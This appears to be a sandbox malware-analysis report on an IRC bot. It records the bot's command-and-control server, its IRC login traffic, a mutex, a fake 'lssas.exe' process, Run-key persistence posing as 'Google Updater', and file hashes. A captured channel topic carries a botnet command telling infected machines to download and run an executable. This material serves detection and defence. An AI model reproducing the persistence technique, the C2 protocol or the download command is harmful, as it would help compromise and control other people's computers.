irc.148club.com:6667
NICK {NEW}[USA][XP-SP2]046767
USER 2260 “” “lol” :2260
JOIN #niu
NICK [USA][XP-SP2]610113
USER 9833 “” “lol” :9833
NICK [USA][XP-SP2]253886
USER 8004 “” “lol” :8004
* The following Host Name was requested from a host database:
o irc.148club.com
Other details
* To mark the presence in the system, the following Mutex object was created:
o fJHGgjJNhgK
* The following ports were open in the system:
Port Protocol Process
1040 TCP lssas.exe (%Temp%lssas.exe)
1042 TCP lssas.exe (%Temp%lssas.exe)
1046 TCP lssas.exe (%Temp%lssas.exe)
Registry Modifications
* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ Google Updater = “%Temp%lssas.exe”
so that lssas.exe runs every time Windows starts
o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
+ Google Updater = “%Temp%lssas.exe”
so that lssas.exe runs every time Windows starts
Memory Modifications
* There were new processes created in the system:
Process Name Process Filename Main Module Size
lssas.exe %Temp%lssas.exe 69 632 bytes
[filename of the sample #1] [file and pathname of the sample #1] 69 632 bytes
File System Modifications
* The following files were created in the system:
# Filename(s) File Size File Hash Alias
1 %Temp%google_cache92.tmp 9 bytes MD5: 0x6C936CB4A4B7F5803BD2E3DEACC3C2FE
SHA-1: 0x561782F6CC10BA3E5AFEAED752F95E589C813891 (not available)
2 %Temp%lssas.exe
[file and pathname of the sample #1] 48 128 bytes MD5: 0x3CB6A3F17487B916CB40E73E0D88C30B
SHA-1: 0x637EB585CB6B96E0F56C6ABF620B72A48C77403B New Malware.b [McAfee]
Mal/SillyFDC-A, Mal/IRCBot-B, Mal/IRCBot-C [Sophos]
Win32.SuspectCrc [Ikarus]
Now talking in ##USA
Topic On: [ ##USA ] [ .dl 1 http://google.com/index.exe or.exe ]
Topic By: [ [BRA][2K3]704872 ]
Modes On: [ ##USA ] [ + 12]